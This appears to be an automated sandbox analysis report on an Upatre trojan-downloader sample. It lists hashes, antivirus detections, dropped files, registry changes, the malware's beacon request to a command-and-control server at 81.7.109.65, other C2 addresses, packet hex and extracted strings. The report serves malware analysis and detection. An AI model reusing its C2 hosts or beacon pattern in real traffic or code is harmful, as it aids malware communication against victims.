Analysis Date2015-10-14 05:11:41
MD545ad31391702eb466c387ad10d970652
SHA1c48e18048f669394dc5afffd4718ca8b523c9dd0

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 1c9cabde003cd2afaef2c7fb4b76b48c sha1: 61a77d0a99d52d4a9b21c3f7a18db60b10cc598b size: 28672
Section.rdata md5: 182095e09af60adf80d285b158e8e3ec sha1: 3cfdab9f9394cd544a8940e1e90ce3b9942c6077 size: 4096
Section.data md5: 71cb675a1f2ebedeba28377166388a9e sha1: c94bfb19df6f37b584b4fffc5af120ad39e92fcf size: 40960
Section.rsrc md5: 6359f4503cf69f71b214c66184325a0d sha1: 721a314ff4a279cbc0c1028342f30c309329e132 size: 24576
Timestamp1982-06-30 16:40:32
VersionFileVersion: 1, 7, 4, 9
ProductVersion: 1, 0, 4, 9
PackerMicrosoft Visual C++ v6.0
PEhashe80522232b54c328594b82b2e35df4909f142724
IMPhashc198dc513ea205655d29d5d9e3512721
AVRisingno_virus
AVMcafeeUpatre-FABL!45AD31391702
AVAvira (antivir)TR/AD.Yarwi.Y.1479
AVTwisterTrojanDldr.Upatre.fio.khjv
AVAd-AwareTrojan.Downloader.JRQQ
AVAlwil (avast)Kryptik-PJI [Trj]
AVEset (nod32)Win32/TrojanDownloader.Waski.F
AVGrisoft (avg)Crypt4.TBP
AVSymantecDownloader.Upatre!g14
AVFortinetW32/Waski.HL!tr
AVBitDefenderTrojan.Downloader.JRQQ
AVK7Trojan ( 004beadd1 )
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Upatre!rfn
AVMicroWorld (escan)Trojan.Downloader.JRQQ
AVMalwareBytesTrojan.Upatre.VM4
AVAuthentiumW32/Downloader.WBWB-6032
AVFrisk (f-prot)W32/Downldr2.IZRA
AVIkarusTrojan.Win32.Crypt
AVEmsisoftTrojan.Downloader.JRQQ
AVZillya!Downloader.Upatre.Win32.22825
AVKasperskyTrojan-Downloader.Win32.Upatre.fio
AVTrend MicroTROJ_UPATRE.SMJY
AVCAT (quickheal)TrojanDownloader.Upatre.RF4
AVVirusBlokAda (vba32)TrojanDownloader.Upatre
AVPadvishno_virus
AVBullGuardTrojan.Downloader.JRQQ
AVArcabit (arcavir)Trojan.Downloader.JRQQ
AVClamAVWin.Trojan.Upatre-3924
AVDr. WebTrojan.Upatre.201
AVF-SecureTrojan.Downloader.JRQQ
AVCA (E-Trust Ino)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\DIDASD9BC.log
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\UlnAKO3o.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\UlnAKO3o.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\UlnAKO3o.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\icanhazip[1].htm
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\malware.exe
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS91.240.97.71
Winsock DNS109.196.204.142
Winsock DNS81.7.109.65
Winsock DNS91.240.97.38
Winsock DNS217.12.59.234
Winsock DNS80.87.220.102
Winsock DNS46.151.130.90
Winsock DNSicanhazip.com
Winsock DNS91.240.97.36

Network Details:

DNSicanhazip.com
Type: A
104.238.145.30
DNSicanhazip.com
Type: A
104.238.141.75
DNSicanhazip.com
Type: A
104.238.136.31
HTTP GEThttp://icanhazip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1)
HTTP GEThttp://81.7.109.65:13380/TUSR13/COMPUTER-XXXXXX/0/51-SP3/0/
User-Agent: Mozilla/5.0 (Windows NT 6.1)
Flows TCP192.168.1.1:1031 ➝ 104.238.145.30:80
Flows TCP192.168.1.1:1032 ➝ 81.7.109.65:13380
Flows TCP192.168.1.1:1033 ➝ 217.12.59.234:443
Flows TCP192.168.1.1:1034 ➝ 217.12.59.234:443
Flows TCP192.168.1.1:1035 ➝ 217.12.59.234:443
Flows TCP192.168.1.1:1036 ➝ 217.12.59.234:443
Flows TCP192.168.1.1:1037 ➝ 80.87.220.102:443
Flows TCP192.168.1.1:1038 ➝ 80.87.220.102:443
Flows TCP192.168.1.1:1039 ➝ 80.87.220.102:443
Flows TCP192.168.1.1:1040 ➝ 80.87.220.102:443
Flows TCP192.168.1.1:1041 ➝ 46.151.130.90:443
Flows TCP192.168.1.1:1042 ➝ 46.151.130.90:443
Flows TCP192.168.1.1:1043 ➝ 46.151.130.90:443
Flows TCP192.168.1.1:1044 ➝ 46.151.130.90:443
Flows TCP192.168.1.1:1045 ➝ 91.240.97.71:443
Flows TCP192.168.1.1:1046 ➝ 91.240.97.71:443
Flows TCP192.168.1.1:1047 ➝ 91.240.97.71:443
Flows TCP192.168.1.1:1048 ➝ 91.240.97.71:443
Flows TCP192.168.1.1:1049 ➝ 91.240.97.36:443
Flows TCP192.168.1.1:1050 ➝ 91.240.97.36:443
Flows TCP192.168.1.1:1051 ➝ 91.240.97.36:443
Flows TCP192.168.1.1:1052 ➝ 91.240.97.36:443
Flows TCP192.168.1.1:1053 ➝ 91.240.97.38:443
Flows TCP192.168.1.1:1054 ➝ 91.240.97.38:443
Flows TCP192.168.1.1:1055 ➝ 91.240.97.38:443
Flows TCP192.168.1.1:1056 ➝ 91.240.97.38:443
Flows TCP192.168.1.1:1057 ➝ 109.196.204.142:443
Flows TCP192.168.1.1:1058 ➝ 109.196.204.142:443

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   41636365 70743a20 74657874 2f2a2c20   Accept: text/*, 
0x00000020 (00032)   6170706c 69636174 696f6e2f 2a0d0a55   application/*..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f35 2e302028 57696e64 6f777320   la/5.0 (Windows 
0x00000050 (00080)   4e542036 2e31290d 0a486f73 743a2069   NT 6.1)..Host: i
0x00000060 (00096)   63616e68 617a6970 2e636f6d 0d0a4361   canhazip.com..Ca
0x00000070 (00112)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000080 (00128)   63616368 650d0a0d 0a                  cache....

0x00000000 (00000)   47455420 2f545553 5231332f 434f4d50   GET /TUSR13/COMP
0x00000010 (00016)   55544552 2d585858 5858582f 302f3531   UTER-XXXXXX/0/51
0x00000020 (00032)   2d535033 2f302f20 48545450 2f312e31   -SP3/0/ HTTP/1.1
0x00000030 (00048)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000040 (00064)   7a696c6c 612f352e 30202857 696e646f   zilla/5.0 (Windo
0x00000050 (00080)   7773204e 5420362e 31290d0a 486f7374   ws NT 6.1)..Host
0x00000060 (00096)   3a203831 2e372e31 30392e36 353a3133   : 81.7.109.65:13
0x00000070 (00112)   3338300d 0a436163 68652d43 6f6e7472   380..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.


Strings
i.G
tFilpAttributesA
eE
..
-E-0-0
\
...
00 ...........?-  
0
0 
0u&
041904b2
1, 0, 4, 9
1, 7, 4, 9
FileVersion
         (((((                  H
jsrnel32.dll
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
_"""####
!""""##
!""####
?,$=&'
"""####
#########################################################################################################
0B=x#A
1#QNAN
1#SNAN
3/$##t
5?&'X-
7HEvytGst
^}%95  A
_9=T)A
abnormal program termination
auxSetVolume
c"""####
@.data
DestroyWindow
DOMAIN error
DSUVWh
ExitProcess
- floating point not loaded
FreeEnvironmentStringsA
FreeEnvironmentStringsW
g"""####
GAIsProcessorFeaturePresent
GDI32.dll
GetACP
GetActiveWindow
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetProcAddress
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemTime
GetTickCount
GetVersion
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
_hypot
Ke#nel
KERNEL32
KERNEL32.dll
k"""IJ
kspdfgh'd;f3454563356yghdfgh567sdfgsdfhdfiojlxdg
LCMapStringA
LCMapStringW
LoadLibraryA
LoadLibraryW
MessageBoxA
Microsoft Visual C++ Runtime Library
MultiByteToWideChar
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
Program: 
<program name unknown>
"""&p/t
PulseEvent
- pure virtual function call
RaiseException
`.rdata
ResumeThread
RtlUnwind
runtime error 
Runtime Error!
SCardForgetCardTypeA
SelectObject
SetHandleCount
SING error
SS@SSPVSS
!""s"x
TerminateProcess
TerminateThread
!This program cannot be run in DOS mode.
t+Ht$Ht
TLOSS error
t#SSUP
+ttHHtd
t.;t$$t(
t$$VSS
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
user32.dll
USER32.dll
VC20XC00U
Vhrt73lA
VirtualAlloc
VirtualFree
WideCharToMultiByte
WINMM.dll
WinSCard.dll
WriteFile
"WWSh\
####"x
_^][YY
"""zV$#